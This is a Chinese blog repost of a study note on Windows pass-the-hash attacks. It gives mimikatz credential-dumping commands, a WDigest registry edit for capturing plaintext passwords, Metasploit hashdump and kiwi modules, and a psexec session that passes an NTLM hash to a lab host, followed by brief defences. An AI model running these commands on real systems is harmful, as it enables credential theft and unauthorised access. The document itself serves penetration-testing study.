20210515web渗透学习之内网渗透哈希攻击(转)

最新推荐文章于 2022-07-11 07:34:00 发布
最新推荐文章于 2022-07-11 07:34:00 发布
阅读量414 收藏
点赞数
分类专栏: WEB渗透学习
原文链接:https://www.cnblogs.com/Xy--1/p/13216686.html
版权
本文详细介绍了哈希传递攻击的概念、利用方法和防范措施,包括使用mimikatz和Metasploit Framework进行攻击,以及KB2871997补丁的影响。同时,提出了移除本地管理员的Debug权限作为防范策略。
摘要由CSDN通过智能技术生成

哈希传递攻击利用(Pass The Hash) 
        </h1>
        <div class="clear"></div>
        <div class="postBody">
            <div id="cnblogs_post_body" class="blogpost-body cnblogs-markdown">

最近又复习了一下内网的相关知识,把以前的整理了一下发出来做个记录。

1|00x01 哈希传递攻击概念

有一点内网渗透经验的都应该听说过哈希传递攻击,通过找到相应账户相关的密码散列值(LM Hash,NTLM Hash)来进行未授权登陆。
可参考Wikipedia的介绍,地址如下:https://en.wikipedia.org/wiki/Pass_the_hash
在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登陆内网中的其他计算机。
在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser)
从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash.在Windows Server 2012 R2及之后版本的操作系统中,默认不会在内存中保存明文密码,Mimikatz 就读不到密码明文。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。修改注册表命令为:

 
 

  
  

   
   reg 
   
   add
   
    HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

因此,攻击者如果使用工具将散列值传递到其他计算机中,进行权限验证,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程),实现对计算机的控制。

1|1NTLM Hash与NTLM

hash分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash。
在Windows中,密码Hash目前称之为NTLM Hash,其中NTLM全称是:“NT LAN Manager”。这个NTLM是一种网络认证协议,与NTLM Hash的关系就是:NTLM网络认证协议是以NTLM Hash作为根本凭证进行认证的协议。也就是说,NTLM与NTLM Hash相互对应。在本地认证的过程中,其实就是将用户输入的密码转换为NTLM Hash与SAM中的NTLM Hash进行比较。
注:
mimikatz支持导出内存中用户的LM hash,但前提是Windows系统支持LM hash
Windows Server 2008启用LM hash的方法:
gpedit.msc->计算机配置->Windows 设置->安全设置->本地策略->安全选项
找到网络安全︰ 不要在下次更改密码存储 LAN 管理器的哈希值,选择已禁用
系统下一次更改密码后,就能够导出LM hash(已经被弃用了)

2|00x02 利用方法

2|11.首先就是神器mimikatz,但你首先得拥有本地管理员的执行的权限。

 
 

  
  

   
   privilege::debug
sekurlsa::logonpasswords


复制NTLM Hash的值

 
 

  
  

   
   sekurlsa::pth /user:administrator /domain:XIAN.COM /ntlm:
   
   7365e
   
   3b
   
   22baeaebc
   
   0411873eedf
   
   84390

完成之后会弹出cmd.exe,或者重新开一个命令行

也可以尝试列出被哈希传递攻击的域内靶机的c盘内容

2|2利用msf进行哈希传递攻击

1|0msf内置的mimikatz获取hash(需要管理员权限)

在msf中也内置有mimikatz,以下命令都可以在msf中获取hash

 
 

  
  

   
   hashdump

   
   run 
   
   hashdump

   
   run 
   
   post/windows/gather/smart_hashdump

   
   除了meterpreter自带的,还可以通过加载mimikatz获得:

   
   load 
   
   mimikatz(必须,否则无以下命令)

   
   msv    
   
   获取的是hash值

   
   tspkg   
   
   tspkg凭证相关的模块

   
   wdigest   
   
   读取内存中存放的账号密码明文信息

   
   kerberos  
   
   kerberos相关的模块

   
   ssp   
   
   获取的是明文信息

mimikatz的原生命令在这里有些改动
mimikatz_command 模块可以让我们使用mimikatz的全部功能。

 
 

  
  

   
   meterpreter > mimikatz_command -f a::  输入一个错误的模块,可以列出所有模块
meterpreter > mimikatz_command -f samdump::  可以列出samdump的子命令
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f handle::
   
   list  列出应用进程
meterpreter > mimikatz_command -f service::
   
   list  列出服务

例如

 
 

  
  

   
   mimikatz_command -f samdump::hashes   获取
   
   hash


建议每种都试一下,可能因为windows版本的高低,有些情况一种命令获取不到,比如我的win2003就只能用hashdump命令才能看到密码hash,

1|0msf的kiwi模块(需要系统权限)

kiwi就是msf内置的mimikatz模块的升级版
但是kiwi是默认加载32位系统的,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后用migrate命令将meterpreter进程迁移到一个64位程序的进程中,才能加载mimikatz并且查看系统明文。如果目标系统是32位的,则没有这个限制。
使用前先在meterpreter下加载kiwi模块

使用命令creds_kerberos列举所有kerberos凭据

可以看到我之前用msf内置的mimikatz没有加载出来的密码,现在明文加载出来了。
再来将用户hash密码加载出来kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令

可以看到成功列出用户密码hash
kiwi模块命令集合

 
 

  
  

   
   creds_all: 列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync: 通过DCSync检索用户帐户信息
dcsync_ntlm: 通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:
   
   dump出lsa的SAM
lsa_dump_secrets:
   
   dump出lsa的密文
password_change:修改密码
wifi_list: 列出当前用户的wifi配置文件
wifi_list_shared: 列出共享wifi配置文件/编码

1|0msf psexec模块

PsExec是sysinternals套件中的一款强大的软件,通过他可以提权和执行远程命令,对于批量大范围的远程运维能起到很好的效果,尤其是在域环境下。但现在,攻击者渐渐开始使用psexec,通过命令行环境与目标靶机进行连接,甚至控制目标机器,而不需要通过远程连接协议(RDP)进行图形化设置,降低了因为恶意操作被管理员发现的可能性(因为PsExec是Windows提供的工具,所以杀毒软件可能会将其列入白名单)
msf中有3个psexec模块都可以进行Hash传递利用:

 
 

  
  

   
   # 执行单个命令的PTH模块

   
   auxiliary/admin/smb/psexec_command


   
   # 执行直接就获取到meterpreter的PTH模块

   
   exploit/windows/smb/psexec


   
   # 支持对一个网段进行PTH进行验证的模块

   
   exploit/windows/smb/psexec_psh

再使用pesxec模块之前要保证:

  1. 开启445端口 SMB服务
  2. 开启admin$共享
    使用之前板块获取到的管理员NTLM Hash
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:7365e3b22baeaebc0411873eedf84390这里前半部分的LM Hash不重要,只要保证后半部分的NTML Hash正确就行。
 
 

  
  

   
   msf5 exploit(multi/handler) > use exploit/windows/smb/psexec

   
   msf5 exploit(windows/smb/psexec) > set lhost 
   
   192.168.5.128

   
   lhost => 
   
   192.168.5.128

   
   msf5 exploit(windows/smb/psexec) > set rhost 
   
   192.168.5.11

   
   rhost => 
   
   192.168.5.11

   
   msf5 exploit(windows/smb/psexec) > set smbuser Administrator

   
   smbuser => Administrator

   
   msf5 exploit(windows/smb/psexec) > set smbpass a
   
   780a
   
   2793038e
   
   0d
   
   41e
   
   929ffc
   
   01395127:
   
   7365e
   
   3b
   
   22baeaebc
   
   0411873eedf
   
   84390 

   
   smbpass => a
   
   780a
   
   2793038e
   
   0d
   
   41e
   
   929ffc
   
   01395127:
   
   7365e
   
   3b
   
   22baeaebc
   
   0411873eedf
   
   84390

   
   msf5 exploit(windows/smb/psexec) > run



这里还有很多不错的获取hash方法没写(主要是懒,用msf方便),比如PowerShell、WCE、AES-256密钥哈希传递、python第三方库impacket下的secretsdump等等,以后有空再记录吧.....

3|00x03 防范措施

3|1KB2871997补丁的影响

防范首先想到打补丁,微软也早在2014年5月发布了KB2871997补丁,该补丁禁止通过本地管理员权限与远程计算机进行连接,其后果就是:无法通过本地管理员权限对远程计算机使用Psexec、WMI、smbecec等,也无法访问远程的文件共享等。
但实际上就算打了KB2871997补丁后,Administrator账号(SID为500)也是例外的,使用该账户的NTLM Hash依然可以进行哈希传递

3|2防御 mimikatz 攻击

mimikatz在抓取散列值或明文密码时,需要用到Debug权限(因为mimikatz需要和lsass进程进行交互,如果没有Debug权限,mimikatz将不能读取lsass进程里的密码)。而Debug权限归本地管理员Administrator所有,目的是确定哪些用户可以将调试器附加到任何进程或内核中,但一般Administrator不会用到这个权限(除非是系统进程)。

所以在配置用户权限时,可以将拥有Debug权限的本地管理员从Administrator组中移除。重启系统之后,在运行mimikatz,在第一步"privilege::debug"时就会报错了。

4|00x04 参考文献

http://saucer-man.com/information_security/443.html#cl-11
https://saucer-man.com/information_security/79.html#cl-13
https://www.freebuf.com/articles/system/217681.html
https://blog.csdn.net/qq_36119192/article/details/104802921
https://www.cnblogs.com/Mikasa-Ackerman/p/hou-shen-tou-zhong-de-mi-ma-zhua-qu.html


EOF

本文作者Lushun
本文链接: https://www.cnblogs.com/Xy–1/p/13216686.html
关于博主:评论和私信会在第一时间回复。或者 直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角 推荐一下。您的鼓励是博主的最大动力!
分类: Kali, 漏洞复现 
<div id="blog_post_info">
0
0 
<div class="clear"></div>
<div id="post_next_prev">

<a href="https://www.cnblogs.com/Xy--1/p/13183256.html" class="p_n_p_prefix">« </a> 上一篇:    <a href="https://www.cnblogs.com/Xy--1/p/13183256.html" title="发布于 2020-06-23 17:21">python协程概念</a>
<br>
<a href="https://www.cnblogs.com/Xy--1/p/13235688.html" class="p_n_p_prefix">» </a> 下一篇:    <a href="https://www.cnblogs.com/Xy--1/p/13235688.html" title="发布于 2020-07-04 17:03">mssql 手工注入流程小结</a>
posted @ 2020-06-30 23:20  Lushun  阅读( 2263)  评论( 0编辑  收藏 
</div><!--end: topics 文章、评论容器-->
热热的雨夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5681
内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
MSF抓取密码
qq_42383069的博客
03-24 1855
MSF抓取密码 导出密码哈希 run hashdump命令   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限 在meterpreter_shell中执行run hashdump命令 命令: run hashdump 用户哈希数据的输出格式为: 用户名:SID:LM哈希:NTLM哈希::: 3. run windows/gather/smart_hashdump命令   run windows/gather/smart_hashdump命令的使用需要系统权限。该
渗透测试之Vulnstack1内网域渗透
LvHLong的博客
04-27 3330
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
wce实现hash注入
weixin_42299610的博客
03-29 765
原理: hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了,hash注入本身是为了对付那些破解不了的NTLM HASH。 操作: 1.先使用wce获取一台内网机器的hash值,太复杂无...
python渗透测试编程技术-方法与实践.azw3_python渗透测试_
09-30
2. 持续学习:渗透测试领域不断更新,定期关注新的漏洞和攻击手段。 3. 模拟演练:定期进行红蓝对抗演练,提升实战能力。 4. 代码审查:团队合作时,进行代码审查以确保代码质量及安全性。 5. 法律法规:遵循当地...
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
【红蓝对抗之Windows内网渗透】是一种网络安全实践,旨在暴露系统漏洞并提高安全防护能力。在企业环境中,外部防御通常严密,但内部网络的安全状况可能相对较弱,因此攻击者常利用员工电脑、外网服务或WiFi等途径...
python妙用之编码的换详解
09-21
Python 编码换详解 在信息技术领域,编码换...无论是Web安全的渗透测试,还是CTF比赛中的编码解密挑战,Python 都能成为你得力的助手。了解并熟练掌握这些编码换技巧,对于提升工作效率和解决实际问题至关重要。
githack泄露利用_softlysu3_ctfgithack_githack_CTF之.git泄露_githack下载_
10-03
为了防止`.git`目录泄露,开发者和系统管理员应确保正确配置Web服务器,避免将`.git`目录包含在可访问的Web根目录内,并且应该对敏感信息进行加密或替换。此外,定期进行安全审计和使用安全工具如GitHack进行自我...
《构建安全web站点》
02-24
同时,持续的代码审查和渗透测试可以帮助找出潜在的安全隐患,并在实际攻击发生前予以修复。 最后,用户教育不可忽视。许多安全问题源于用户自身的行为,如点击钓鱼链接、使用弱密码等。通过培训,让用户了解基本的...
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6854
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3865
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
后渗透攻击命令和模块
Cwillchris的博客
04-12 1353
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块 一、命令 1、arp 查看内网主机 2、background 将当前的会话在后台运行。从而进行新的渗透测试。 如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令 3、clearev 清除系统,软件之类的所有登陆信息 4、download、upload download可以下载目标系统的文件 upload可以上传本机文件到目标系统
Mimikatz使用方法
热门推荐
她叫常玉莹
08-21 1万+
Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 Mimikatz命令 cls:清屏 standa..
metasploit完整的使用流程包括meterpreter后渗透
m0_57379855的博客
03-31 4049
metasploit完整的使用流程包括meterpreter后渗透主机发现基于ARP发现内网存活主机基于FTP服务基于HTTP服务基于SMB漏洞扫描漏洞渗透利用利用ms17_010利用植入木马后渗透meterpretermeterpreter常用反弹类型meterpreter常用命令backgroundsessionsbgkillbglistbgrunchannelcloseexitquitinteract idrunirbreadrun和bgrunuseload/use针对安卓手机针对Windows的一些
三层网络防护的域渗透
LainWith的博客
01-07 2619
目录环境准备网络拓扑配置网卡网络联通性测试一些账号绑定host其他目标信息收集端口扫描美化扫描结果网站探测指纹识别WAF识别目录扫描siteserver 漏洞利用绕狗注入忘记密码上传木马getshell后渗透提权菜刀msfmsf生成shellcodeAdvanced AV Evasion免杀MSF开启监听获取session进程迁移哈希明文开放的端口-3389关闭防护内网主机发现配置路由配置socks攻击内网OA系统端口扫描getshell信息收集网络信息通网情况服务信息进程信息端口信息系统信息用户信息小结
vulstack2(hydra爆mssql、免杀360、cs、msf渗透、weblogic、computer brower服务支持6118,域管密码过期kerberos认证错误导致部分域服务不可用)
qq_45290991的博客
09-24 1743
很久之前打了第一个靶场,但是打的不全,不舒坦,不够彻底,由于一直报rpc连接失败所以有的步骤不顺,这次学了一点小小的免杀技巧,过来带着练习的心态学学这个靶场。 0、环境搭建(难点) 环境搭建参考:漏洞详情 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 红日靶场二 WalkThrough – Crispr –热爱技术和生活 记得要在web机子里面手动开启服务,在 C:\Oracle\Middleware\user_projects\doma
metasploit获取系统密码hash值
天元喜羊羊的博客
04-27 6043
meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY e503dc5ce6734d7f11ccecf5623b0f1c... [*] Obtaining the user list and keys... [*] Decrypting user keys
windows hash 抓取(dump)工具 - quarkspwdump
海阔天空
03-18 6738
本机测试:Windows7 64位     Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。
Web安全渗透学习路径指南
"Web安全渗透工程师的学习攻略" 在Web安全领域,渗透工程师扮演着重要的角色,他们负责识别并修复网站的安全漏洞,防止恶意攻击。本文旨在为想要成为Web安全渗透工程师的初学者提供一条清晰的学习路径。 0x00 前言...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值